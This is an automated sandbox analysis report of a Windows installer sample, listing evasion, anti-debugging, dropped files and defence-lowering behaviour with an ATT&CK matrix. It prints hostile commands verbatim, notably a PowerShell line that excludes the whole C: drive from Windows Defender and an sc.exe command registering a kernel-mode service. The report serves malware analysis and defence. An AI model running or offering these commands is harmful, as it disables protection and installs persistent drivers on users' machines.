Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3367Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6387Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 592Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 555Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 541Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-H48MF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9698B0 FindFirstFileA,FindClose,FindClose,12_2_6C9698B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,17_2_009B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,17_2_009B7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B9C60 GetSystemInfo,17_2_009B9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1371000620.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000005.00000002.1541589817.0000020AE9E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000005.00000002.1542145500.0000020AE9F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541822263.0000020AE9E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: @
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000A.00000002.1540505343.00000202A1E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3886 NtSetInformationThread 00000000,00000011,00000000,0000000012_2_6C7F3886
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6C97EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,17_2_00A357D0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97DF9D mov eax, dword ptr fs:[00000030h]12_2_6C97DF9D
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C988B86 mov eax, dword ptr fs:[00000030h]12_2_6C988B86
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C988B55 mov eax, dword ptr fs:[00000030h]12_2_6C988B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6C97EFA1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C977ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_6C977ADD

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.19.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA45720 cpuid 12_2_6CA45720
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009BAB2A GetSystemTimeAsFileTime,17_2_009BAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A50090 GetVersion,17_2_00A50090

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
Source: svchost.exe, 00000007.00000002.1542269208.000001FEBB102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
2
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
11
Windows Service
1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
LSASS Memory3
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
Logon Script (Windows)11
Windows Service
3
Obfuscated Files or Information
Security Account Manager36
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution
Login Hook111
Process Injection
1
Software Packing
NTDS361
Security Software Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets251
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Masquerading
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
Virtualization/Sandbox Evasion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc Filesystem2
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579756 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 92 90 time.windows.com 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 PE file contains section with special chars 2->96 98 2 other signatures 2->98 11 #U5b89#U88c5#U52a9#U624b_2.0.7.exe 2 2->11         started        14 svchost.exe 2->14         started        17 cmd.exe 2->17         started        19 30 other processes 2->19 signatures3 process4 file5 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32 11->86 dropped 21 #U5b89#U88c5#U52a9#U624b_2.0.7.tmp 3 5 11->21         started        112 Changes security center settings (notifications, updates, antivirus, firewall) 14->112 25 sc.exe 1 17->25         started        27 sc.exe 1 19->27         started        29 sc.exe 1 19->29         started        31 sc.exe 1 19->31         started        33 21 other processes 19->33 signatures6 process7 file8 74 C:\Users\user\AppData\Local\...\update.vac, PE32 21->74 dropped 76 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 21->76 dropped 100 Adds a directory exclusion to Windows Defender 21->100 35 #U5b89#U88c5#U52a9#U624b_2.0.7.exe 2 21->35         started        38 powershell.exe 23 21->38         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        45 conhost.exe 29->45         started        47 conhost.exe 31->47         started        49 conhost.exe 33->49         started        51 conhost.exe 33->51         started        53 19 other processes 33->53 signatures9 process10 file11 72 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32 35->72 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.7.tmp 4 16 35->55         started        102 Loading BitLocker PowerShell Module 38->102 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures12 process13 file14 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\updat4.vac, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->82 dropped 84 3 other files (none is malicious) 55->84 dropped 104 Query firmware table information (likely to detect VMs) 55->104 106 Protects its processes via BreakOnTermination flag 55->106 108 Hides threads from debuggers 55->108 110 Contains functionality to hide a thread from the debugger 55->110 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures15 process16 file17 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process18

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.7.exe8%ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.7.exe10%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-H48MF.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Program Files (x86)\Windows NT\updat4.vac13%ReversingLabs
